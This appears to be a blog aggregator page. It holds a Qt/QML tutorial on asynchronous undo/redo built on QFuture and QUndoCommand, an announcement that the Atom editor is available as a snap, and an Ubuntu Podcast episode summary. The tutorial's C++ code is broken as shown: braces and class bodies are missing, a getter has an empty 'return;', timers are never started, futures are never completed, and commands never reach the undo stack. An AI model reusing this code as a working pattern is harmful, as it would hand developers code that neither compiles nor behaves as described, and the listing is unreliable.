Imagine we want an editor that has undo and redo capability. But the operations on the editor are all asynchronous. This implies that also undo and redo are asynchronous operations.

We want all this to be available in QML, we want to use QFuture for the asynchronous stuff and we want to use QUndoCommand for the undo and redo capability.

But how do they do it?

First of all we will make a status object, to put the status of the asynchronous operations in (asyncundoable.h).

class AbstractAsyncStatus: public QObject

    Q_PROPERTY(bool success READ success CONSTANT)
    Q_PROPERTY(int extra READ extra CONSTANT)
    AbstractAsyncStatus(QObject *parent):QObject (parent) {}
    virtual bool success() = 0;
    virtual int extra() = 0;

We will be passing it around as a QSharedPointer, so that lifetime management becomes easy. But typing that out is going to give us long APIs. So let’s make a typedef for that (asyncundoable.h).

typedef QSharedPointer<AbstractAsyncStatus> AsyncStatusPointer;

Now let’s make ourselves an undo command that allows us to wait for asynchronous undo and asynchronous redo. We’re combining QUndoCommand and QFutureInterface here (asyncundoable.h).

class AbstractAsyncUndoable: public QUndoCommand
    AbstractAsyncUndoable( QUndoCommand *parent = nullptr )
        : QUndoCommand ( parent )
        , m_undoFuture ( new QFutureInterface<AsyncStatusPointer>() )
        , m_redoFuture ( new QFutureInterface<AsyncStatusPointer>() ) {}
    QFuture<AsyncStatusPointer> undoFuture()
        { return m_undoFuture->future(); }
    QFuture<AsyncStatusPointer> redoFuture()
        { return m_redoFuture->future(); }

    QScopedPointer<QFutureInterface<AsyncStatusPointer> > m_undoFuture;
    QScopedPointer<QFutureInterface<AsyncStatusPointer> > m_redoFuture;


Okay, let’s implement these with an example operation. First the concrete status object (asyncexample1command.h).

class AsyncExample1Status: public AbstractAsyncStatus
    Q_PROPERTY(bool example1 READ example1 CONSTANT)
    AsyncExample1Status ( bool success, int extra, bool example1,
                          QObject *parent = nullptr )
        : AbstractAsyncStatus(parent)
        , m_example1 ( example1 )
        , m_success ( success )
        , m_extra ( extra ) {}
    bool example1() { return m_example1; }
    bool success() Q_DECL_OVERRIDE { return m_success; }
    int extra() Q_DECL_OVERRIDE { return m_extra; }
    bool m_example1 = false;
    bool m_success = false;
    int m_extra = -1;

Let’s make a QUndoCommand that uses a timer to simulate asynchronous behavior. We could also use QtConcurrent’s run function to use a QThreadPool and QRunnable instances that also implement QFutureInterface, of course. Seasoned Qt developers know what I mean. For the sake of example, I wanted to illustrate that QFuture can also be used for asynchronous things that aren’t threads. We’ll use the lambda because QUndoCommand isn’t a QObject, so no easy slots. That’s the only reason (asyncexample1command.h).

class AsyncExample1Command: public AbstractAsyncUndoable
    AsyncExample1Command(bool example1, QUndoCommand *parent = nullptr)
        : AbstractAsyncUndoable ( parent ), m_example1(example1) {}
    void undo() Q_DECL_OVERRIDE {
        QTimer *timer = new QTimer();
        QObject::connect(timer, &QTimer::timeout, [=]() {
            QSharedPointer<AbstractAsyncStatus> result;
            result.reset(new AsyncExample1Status ( true, 1, m_example1 ));
        } );
    void redo() Q_DECL_OVERRIDE {
        QTimer *timer = new QTimer();
        QObject::connect(timer, &QTimer::timeout, [=]() {
            QSharedPointer<AbstractAsyncStatus> result;
            result.reset(new AsyncExample1Status ( true, 2, m_example1 ));
        } );
    QTimer m_timer;
    bool m_example1;

Let’s now define something we get from the strategy design pattern; a editor behavior. Implementations provide an editor all its editing behaviors (abtracteditorbehavior.h).

class AbstractEditorBehavior : public QObject
    AbstractEditorBehavior( QObject *parent) : QObject (parent) {}

    virtual QFuture<AsyncStatusPointer> performExample1( bool example1 ) = 0;
    virtual QFuture<AsyncStatusPointer> performUndo() = 0;
    virtual QFuture<AsyncStatusPointer> performRedo() = 0;
    virtual bool canRedo() = 0;
    virtual bool canUndo() = 0;

So far so good, so let’s make an implementation that has a QUndoStack and that therefor is undoable (undoableeditorbehavior.h).

class UndoableEditorBehavior: public AbstractEditorBehavior
    UndoableEditorBehavior(QObject *parent = nullptr)
        : AbstractEditorBehavior (parent)
        , m_undoStack ( new QUndoStack ){}

    QFuture<AsyncStatusPointer> performExample1( bool example1 ) Q_DECL_OVERRIDE {
        AsyncExample1Command *command = new AsyncExample1Command ( example1 );
        return command->redoFuture();
    QFuture<AsyncStatusPointer> performUndo() {
        const AbstractAsyncUndoable *undoable =
            dynamic_cast<const AbstractAsyncUndoable *>(
                    m_undoStack->command( m_undoStack->index() - 1));
        return const_cast<AbstractAsyncUndoable*>(undoable)->undoFuture();
    QFuture<AsyncStatusPointer> performRedo() {
        const AbstractAsyncUndoable *undoable =
            dynamic_cast<const AbstractAsyncUndoable *>(
                    m_undoStack->command( m_undoStack->index() ));
        return const_cast<AbstractAsyncUndoable*>(undoable)->redoFuture();
    bool canRedo() Q_DECL_OVERRIDE { return m_undoStack->canRedo(); }
    bool canUndo() Q_DECL_OVERRIDE { return m_undoStack->canUndo(); }
    QScopedPointer<QUndoStack> m_undoStack;

Now we only need an editor, right (editor.h)?

class Editor: public QObject
    Q_PROPERTY(AbstractEditorBehavior* editorBehavior READ editorBehavior CONSTANT)
    Editor(QObject *parent=nullptr) : QObject(parent)
        , m_editorBehavior ( new UndoableEditorBehavior ) { }
    AbstractEditorBehavior* editorBehavior() { return; }
    Q_INVOKABLE void example1Async(bool example1) {
        QFutureWatcher<AsyncStatusPointer> *watcher = new QFutureWatcher<AsyncStatusPointer>(this);
        connect(watcher, &QFutureWatcher<AsyncStatusPointer>::finished,
                this, &Editor::onExample1Finished);
        watcher->setFuture ( m_editorBehavior->performExample1(example1) );
    Q_INVOKABLE void undoAsync() {
        if (m_editorBehavior->canUndo()) {
            QFutureWatcher<AsyncStatusPointer> *watcher = new QFutureWatcher<AsyncStatusPointer>(this);
            connect(watcher, &QFutureWatcher<AsyncStatusPointer>::finished,
                    this, &Editor::onUndoFinished);
            watcher->setFuture ( m_editorBehavior->performUndo() );
    Q_INVOKABLE void redoAsync() {
        if (m_editorBehavior->canRedo()) {
            QFutureWatcher<AsyncStatusPointer> *watcher = new QFutureWatcher<AsyncStatusPointer>(this);
            connect(watcher, &QFutureWatcher<AsyncStatusPointer>::finished,
                    this, &Editor::onRedoFinished);
            watcher->setFuture ( m_editorBehavior->performRedo() );
    void example1Finished( AsyncExample1Status *status );
    void undoFinished( AbstractAsyncStatus *status );
    void redoFinished( AbstractAsyncStatus *status );
private slots:
    void onExample1Finished() {
        QFutureWatcher<AsyncStatusPointer> *watcher =
                dynamic_cast<QFutureWatcher<AsyncStatusPointer>*> (sender());
        emit example1Finished( watcher->result().objectCast<AsyncExample1Status>().data() );
    void onUndoFinished() {
        QFutureWatcher<AsyncStatusPointer> *watcher =
                dynamic_cast<QFutureWatcher<AsyncStatusPointer>*> (sender());
        emit undoFinished( watcher->result().objectCast<AbstractAsyncStatus>().data() );
    void onRedoFinished() {
        QFutureWatcher<AsyncStatusPointer> *watcher =
                dynamic_cast<QFutureWatcher<AsyncStatusPointer>*> (sender());
        emit redoFinished( watcher->result().objectCast<AbstractAsyncStatus>().data() );
    QScopedPointer<AbstractEditorBehavior> m_editorBehavior;

Okay, let’s register this up to make it known in QML and make ourselves a main function (main.cpp).

#include <QtQml>
#include <QGuiApplication>
#include <QQmlApplicationEngine>
#include <editor.h>
int main(int argc, char *argv[])
    QGuiApplication app(argc, argv);
    QQmlApplicationEngine engine;
    qmlRegisterType<Editor>("be.codeminded.asyncundo", 1, 0, "Editor");
    return app.exec();

Now, let’s make ourselves a simple QML UI to use this with (main.qml).

import QtQuick 2.3
import QtQuick.Window 2.2
import QtQuick.Controls 1.2
import be.codeminded.asyncundo 1.0
Window {
    visible: true
    width: 360
    height: 360
    Editor {
        id: editor
        onUndoFinished: text.text = "undo"
        onRedoFinished: text.text = "redo"
        onExample1Finished: text.text = "whoohoo " + status.example1
    Text {
        id: text
        text: qsTr("Hello World")
        anchors.centerIn: parent
    Action {
        shortcut: "Ctrl+z"
        onTriggered: editor.undoAsync()
    Action {
        shortcut: "Ctrl+y"
        onTriggered: editor.redoAsync()
    Button  {
        onClicked: editor.example1Async(99);

You can find the sources of this complete example at github. Enjoy!

0 Add to favourites0 Bury

11 May, 2017 08:09PM by Philip Van Hoof (

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: Atom is now available as a snap for Ubuntu

There’s a new desktop snap in the Snap store: Atom.

The hackable editor, backed by GitHub

Launched in 2014, Atom has been rapidly adopted by a large community and is considered one of the top language agnostic code editors. It offers a constantly growing library of 6 000+ addons for all purposes, from themes to IDE features.

To install Atom as a snap:

sudo snap install --classic atom

Atom has most of the features you can expect from a modern code editor, such as project trees and autocompletion. It also comes with git integration, a built-in package manager, a file-system browser, multiple panes and a versatile find and replace function that allows you to replace strings in multiple files and across projects.

Open source and built on the cross-platform Electron framework, it provides deep introspection into its own code and is well suited for customization, allowing incredibly useful extensions such as git-time-machine or todo-show.

The git-time-machine extension draws a bubble chart of the git file history at the bottom of the panes and lets you navigate the timeline of changes.

Enabling availability

So why does it make sense to have Atom packaged as a snap? Snaps mean simple installation and update management, without affecting the application: everything works as expected, including extensions.

It also means that when software vendors make them available, it’s easier to access the beta version of their app or even daily builds. In practice, this snap makes the latest version of Atom easily installable and auto-updatable for Ubuntu 14.04, 16.04 and newer supported releases, goodbye 3rd party PPAs and general package hunting.

What’s in a classic snap?

You may have noticed that Atom is a classic snap (as seen in the snap install command with the --classic flag), which means it’s not strictly confined. Classic snaps are a way to start snapping complex software that has not been built with relocation in mind. When snaps under strict confinement consider /snap/core/current/ as the root of the file system, classic snaps use /, as most legacy packaged app would do, therefore they can read and write in the host file system and not only in their dedicated confined space.

Here is an introduction to snaps confinement modes:

11 May, 2017 04:31PM by Ubuntu Insights (

Ubuntu Podcast from the UK LoCo: S10E10 – Miniature Blushing Steel - Ubuntu Podcast

This week we interview Joey Sneddon, editor of OMG! Ubuntu! We also discuss ripping audio from an Android app, removing dust from a PC, bring you some GUI Love and go over your feedback.

It’s Season Ten Episode Ten of the Ubuntu Podcast! Alan Pope, Mark Johnson, Martin Wimpress and Joey Sneddon are connected and speaking to your brain.

In this week’s show:

  • We discuss what we’ve been upto recently:
    • Martin has been pirating audio from an Android app.
    • Alan has been getting rid of dust with a new heatsink.
  • We interview Joey Sneddon, editor of OMG! Ubuntu!.

  • We share a GUI Lurve:

  • And we go over all your amazing feedback – thanks for sending it – please keep sending it!

  • This weeks cover image is taken from Vimeo.

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

11 May, 2017 02:00PM